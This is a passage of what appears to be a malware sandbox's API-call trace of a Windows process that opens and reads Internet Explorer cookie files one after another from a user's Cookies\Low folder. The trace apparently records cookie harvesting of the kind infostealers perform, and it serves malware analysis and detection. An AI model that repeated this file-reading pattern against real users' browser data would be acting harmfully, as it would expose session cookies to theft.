lpWideCharStr="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0136.169] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x2c) returned 0x7ce03e8 [0136.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", cchWideChar=44, lpMultiByteStr=0x7ce03e8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpUsedDefaultChar=0x0) returned 44 [0136.169] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x7ce0590 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.169] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c976c8 [0136.169] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.169] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x7ce0fd8 [0136.169] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c91690 [0136.169] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x6c91750 [0136.170] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.170] GetFileType (hFile=0x340) returned 0x1 [0136.170] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c976c8 | out: hHeap=0x6c90000) returned 1 [0136.170] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1000) returned 0x6c97b18 [0136.170] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x66, lpOverlapped=0x0) returned 1 [0136.172] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce03e8 [0136.172] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce0590 [0136.172] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce05b8 [0136.173] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce07f8 [0136.173] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce0820 [0136.173] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce07f8 | out: hHeap=0x6c90000) returned 1 [0136.173] GetLastError () returned 0x0 [0136.173] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.173] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.173] CloseHandle (hObject=0x340) returned 1 [0136.173] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce05b8 | out: hHeap=0x6c90000) returned 1 [0136.173] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0590 | out: hHeap=0x6c90000) returned 1 [0136.173] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91750 | out: hHeap=0x6c90000) returned 1 [0136.173] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91690 | out: hHeap=0x6c90000) returned 1 [0136.174] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0fd8 | out: hHeap=0x6c90000) returned 1 [0136.174] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.174] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.174] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0136.174] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x26) returned 0x7ce03e8 [0136.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", cchWideChar=38, lpMultiByteStr=0x7ce03e8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpUsedDefaultChar=0x0) returned 38 [0136.174] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c915d0 [0136.174] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.174] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x80) returned 0x6c976c8 [0136.174] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.174] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x7ce0fd8 [0136.174] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c91690 [0136.174] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x6c91750 [0136.174] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.175] GetFileType (hFile=0x340) returned 0x1 [0136.175] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c976c8 | out: hHeap=0x6c90000) returned 1 [0136.176] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1000) returned 0x6c97b18 [0136.176] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x5d, lpOverlapped=0x0) returned 1 [0136.177] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce03e8 [0136.177] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x6c915d0 [0136.178] GetLastError () returned 0x0 [0136.178] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.179] CloseHandle (hObject=0x340) returned 1 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91750 | out: hHeap=0x6c90000) returned 1 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91690 | out: hHeap=0x6c90000) returned 1 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0fd8 | out: hHeap=0x6c90000) returned 1 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.179] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adform[1].txt", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0136.179] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x23) returned 0x7ce03e8 [0136.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adform[1].txt", cchWideChar=35, lpMultiByteStr=0x7ce03e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5p5nrgjn0js_halpmcxz@adform[1].txt", lpUsedDefaultChar=0x0) returned 35 [0136.179] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c915d0 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.179] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x70) returned 0x7ce07f8 [0136.179] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.179] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x7ce0fd8 [0136.180] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c91690 [0136.180] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x6c91750 [0136.180] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.181] GetFileType (hFile=0x340) returned 0x1 [0136.182] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce07f8 | out: hHeap=0x6c90000) returned 1 [0136.182] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1000) returned 0x6c97b18 [0136.182] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0xea, lpOverlapped=0x0) returned 1 [0136.185] GetLastError () returned 0x0 [0136.185] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.185] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.185] CloseHandle (hObject=0x340) returned 1 [0136.185] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.185] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91750 | out: hHeap=0x6c90000) returned 1 [0136.186] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91690 | out: hHeap=0x6c90000) returned 1 [0136.186] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0fd8 | out: hHeap=0x6c90000) returned 1 [0136.186] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.186] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.186] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adnxs[1].txt", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0136.186] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x22) returned 0x7ce03e8 [0136.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adnxs[1].txt", cchWideChar=34, lpMultiByteStr=0x7ce03e8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpUsedDefaultChar=0x0) returned 34 [0136.186] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c915d0 [0136.186] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.186] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x70) returned 0x7ce07f8 [0136.186] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.186] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x7ce0fd8 [0136.186] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c91690 [0136.186] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x6c91750 [0136.186] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.188] GetFileType (hFile=0x340) returned 0x1 [0136.188] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce07f8 | out: hHeap=0x6c90000) returned 1 [0136.188] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1000) returned 0x6c97b18 [0136.188] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x242, lpOverlapped=0x0) returned 1 [0136.190] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce03e8 [0136.190] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c915d0 [0136.190] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.190] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x7ce03e8 [0136.191] GetLastError () returned 0x0 [0136.192] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.192] CloseHandle (hObject=0x340) returned 1 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c976c8 | out: hHeap=0x6c90000) returned 1 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91750 | out: hHeap=0x6c90000) returned 1 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91690 | out: hHeap=0x6c90000) returned 1 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0fd8 | out: hHeap=0x6c90000) returned 1 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c99c20 | out: hHeap=0x6c90000) returned 1 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.192] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adtech[2].txt", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0136.192] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x23) returned 0x7ce03e8 [0136.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adtech[2].txt", cchWideChar=35, lpMultiByteStr=0x7ce03e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpUsedDefaultChar=0x0) returned 35 [0136.192] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c915d0 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.192] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x70) returned 0x7ce07f8 [0136.192] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.192] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x7ce0fd8 [0136.193] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c91690 [0136.193] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x6c91750 [0136.193] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.194] GetFileType (hFile=0x340) returned 0x1 [0136.194] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce07f8 | out: hHeap=0x6c90000) returned 1 [0136.194] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1000) returned 0x6c97b18 [0136.194] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x65, lpOverlapped=0x0) returned 1 [0136.195] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x20) returned 0x7ce03e8 [0136.195] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c915d0 [0136.195] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.195] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x7ce03e8 [0136.197] GetLastError () returned 0x0 [0136.197] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.197] CloseHandle (hObject=0x340) returned 1 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91750 | out: hHeap=0x6c90000) returned 1 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91690 | out: hHeap=0x6c90000) returned 1 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0fd8 | out: hHeap=0x6c90000) returned 1 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c96738 | out: hHeap=0x6c90000) returned 1 [0136.197] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x50) returned 0x6c96738 [0136.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adtr02[1].txt", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0136.197] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x23) returned 0x7ce03e8 [0136.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5p5nrgjn0js_halpmcxz@adtr02[1].txt", cchWideChar=35, lpMultiByteStr=0x7ce03e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5p5nrgjn0js_halpmcxz@adtr02[1].txt", lpUsedDefaultChar=0x0) returned 35 [0136.197] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x30) returned 0x6c915d0 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.197] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x70) returned 0x7ce07f8 [0136.197] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c915d0 | out: hHeap=0x6c90000) returned 1 [0136.198] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x7ce0fd8 [0136.198] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x18) returned 0x6c91690 [0136.198] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x4) returned 0x6c91750 [0136.198] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.198] GetFileType (hFile=0x340) returned 0x1 [0136.198] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce07f8 | out: hHeap=0x6c90000) returned 1 [0136.199] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x1000) returned 0x6c97b18 [0136.199] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x52, lpOverlapped=0x0) returned 1 [0136.201] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.201] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.201] CloseHandle (hObject=0x340) returned 1 [0136.201] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.202] GetFileType (hFile=0x340) returned 0x1 [0136.202] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x125, lpOverlapped=0x0) returned 1 [0136.204] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0x0, lpOverlapped=0x0) returned 1 [0136.204] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c97b18 | out: hHeap=0x6c90000) returned 1 [0136.204] CloseHandle (hObject=0x340) returned 1 [0136.204] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c91608 | out: hHeap=0x6c90000) returned 1 [0136.204] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce03e8 | out: hHeap=0x6c90000) returned 1 [0136.204] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0136.205] GetFileType (hFile=0x340) returned 0x1 [0136.205] ReadFile (in: hFile=0x340, lpBuffer=0x6c97b18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d4c8, lpOverlapped=0x0 | out: lpBuffer=0x6c97b18*, lpNumberOfBytesRead=0x18d4c8*=0xdd, lpOverlapped=0x0) returned 1 [0136.206] ReadFile (in: hFile=0x340, 